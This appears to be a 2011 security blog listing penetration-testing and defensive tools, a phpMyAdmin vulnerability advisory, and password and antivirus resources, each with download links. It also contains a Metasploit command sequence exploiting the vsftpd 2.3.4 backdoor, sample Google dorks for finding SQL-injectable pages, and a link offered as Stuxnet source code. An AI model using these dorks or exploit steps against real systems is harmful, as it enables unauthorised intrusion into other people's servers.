“SniffJoke (Sj) implements a set of anti sniffing technology itself, but begins developed as a modular framework.
Will easily be supported by a security community that wants to exploit and explore sniffing faults. SniffJoke is an application for Linux that handles transparently your TCP connection, delaying, modifying and injecting fake packets inside your transmission, making them almost impossible to be correctly read by a passive wiretapping technology (IDS or sniffer). An internet client running SniffJoke injects in the transmission flow some packets able to seriously disturb passive analysis like sniffing, interception and low level information theft. No server support needed!”

Download Sniffjoke v0.4.2 (sniffjoke-0.4.2.tar.bz2)
https://github.com/vecna/sniffjoke/downloads



phpMyAdmin Multiple Vulnerabilities
Software:
phpMyAdmin 3.x

1) An error within the "Swekey_login()" function in libraries/auth/swekey/swekey.auth.lib.php can be exploited to overwrite session variables and e.g. inject and execute arbitrary PHP code.

2) Input passed to the "PMA_createTargetTables()" function in libraries/server_synchronize.lib.php is not properly sanitised before calling the "preg_replace()" function with the "e" modifier. This can be exploited to execute arbitrary PHP code via URL-encoded NULL bytes.

3) Input passed to the "PMA_displayTableBody()" function in libraries/display_tbl.lib.php is not properly sanitised before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences.

NOTE: There is also a weakness in the setup scripts, which could lead to arbitrary PHP code injection if session variables are overwritten.

The vulnerabilities are in versions prior to 3.3.10.2 and 3.4.3.1.



Skipfish-2.01b - Linux
A fully automated, active web application security reconnaissance tool. Key features:
High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets.
Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion.
Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors.

Download:
http://code.google.com/p/skipfish/downloads/list



Faces of Hacking
Some hackers use software and hardware to express themselves creatively...


http://www.pentestit.com/wp-content/uploads/HLIC/e57cb16a9284494b6fb328de8e8539d2.png



Tuesday, 5. July 2011
Sqlninja v.0.2.6-rc1 Linux
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:

Linux
FreeBSD
Mac OS X

It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:

ICMP-based shell
CVE-2010-0232 support to escalate the sqlservr.exe process to SYSTEM (greetz Tavis)
Header-based injection support

Download:
http://sqlninja.sourceforge.net/download.html



Arachni v0.2.4 Security Scanner Linux
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.
The main focus of this release has been on taking care of some pesky bugs and implementing a few feature requests.

Download: https://github.com/Zapotek/arachni

See Changelog: http://arachni.segfault.gr



Video Demonstration : Vsftpd backdoor
Affected versions :
vsftpd-2.3.4 from 2011-06-30

https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5

Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded

discovered by Mathias Kresin



Monday, 4. July 2011
HTTrack Windows
What is HTTrack:
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system. WinHTTrack is the Windows 2000/XP/Vista/Seven release of HTTrack.

Where is the home page?
You can find the official homepage at this URL:
http://www.httrack.com/



Passwords - Dictionaries - Rainbow Tables - Online
Default passwords can be obtained from the following websites:

http://www.phenoelit-us.org/dpl/dpl.html
http://cirt.net/passwords
http://www.defaultpassword.com
http://www.passwordsdatabase.com
http://www.isdpodcast.com/resources/62k-common-passwords/

http://www.insidepro.com/eng/download.shtml
http://www.insidepro.com/tables.php



Malware Analyser 3.2
Malware Analyser is a freeware tool to perform static and dynamic analysis of malware.

The features are:

String based analysis for registry, API calls, IRC commands, DLLs called and VMAware.

Display detailed headers of PE with all its section details, import and export symbols etc.

On distros, can perform an ASCII dump of the PE along with other options (check --help argument).

For Windows, it can generate various sections of a PE: DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections.
ASCII dump on Windows machine.

Code analysis (disassembling).

Online malware checking (www.virustotal.com).

Check for packer from the database.

Tracer functionality: can be used to identify anti-debugging call tricks, file system manipulation calls, rootkit hooks, keyboard hooks, DEP setting change, network identification traces.

Signature creation: allows creating a signature of the malware.

Batch mode scan to scan all DLL and EXE files in directories and sub-directories.


Download:
http://beenuarora.com/malware_analyser%203.2.zip



Free Anti Keylogger & Anti Virus
ANTI VIRUS:
1. AVG Anti-Virus Free Edition
http://adf.ly/313683/http://free.avg.com/download-avg-anti-virus-free-edition

2. Avira AntiVir Personal
http://adf.ly/313683/http://www.free-av.com/en/products/1/avira_antivir_personal__free_antivirus.html

3. Avast Home Free Edition
http://adf.ly/313683/http://avast.com/eng/download-avast-home.html

4. PC Tools AntiVirus Free Edition
http://adf.ly/313683/http://www.pctools.com/free-antivirus/

5. Comodo Internet Security
http://adf.ly/313683/http://www.personalfirewall.comodo.com/download_firewall.html

6. MicroWorld Free AntiVirus Toolkit Utility (MWAV)
http://adf.ly/313683/http://http//www.mwti.net/products/mwav/mwav.asp

7. BitDefender Free Edition
http://adf.ly/313683/http://www.bitdefender.com/PRODUCT-14-en--BitDefender-Free-Edition.html

ANTI KEYLOGGER
1. KeyScrambler Personal
Download: http://www.qfxsoftware.com/Download.htm

2. I Hate Keyloggers
Download: http://dewasoft.com/privacy/i-hate-keyloggers.htm#download

3. PSMAntiKeyLogger
Download: http://sourceforge.net/projects/psmantikeyloger/files/

4. SnoopFree Privacy Shield
Download: http://www.snoopfree.com/PrivacyShield.htm

5. MyPlanetSoft Anti-Keylogger
Download: http://www.myplanetsoft.com/free/antikeylog.php



Database of files from Microsoft
...categorized by versions

Homepage:
http://www.mskbfiles.com/



5000 SQL Dorks
inurl:declaration_more.php?decl_id=
inurl:Pageid="
.......................
.......................

Download:
http://www62.megaupload.com/files/4cef0fdb4a3a7b84ca88ebdce2e54dc5/Neu_Textdokument.txt



Stuxnet Source Code C&C++
Stuxnet is designed to programmatically alter Programmable Logic Controllers (PLCs) used in those facilities. In an ICS environment, the PLCs automate industrial type tasks such as regulating flow rate to maintain pressure and temperature controls.

Download:
http://www.multiupload.com/BDNYSCY5PC

http://youtu.be/7g0pi4J8auQ
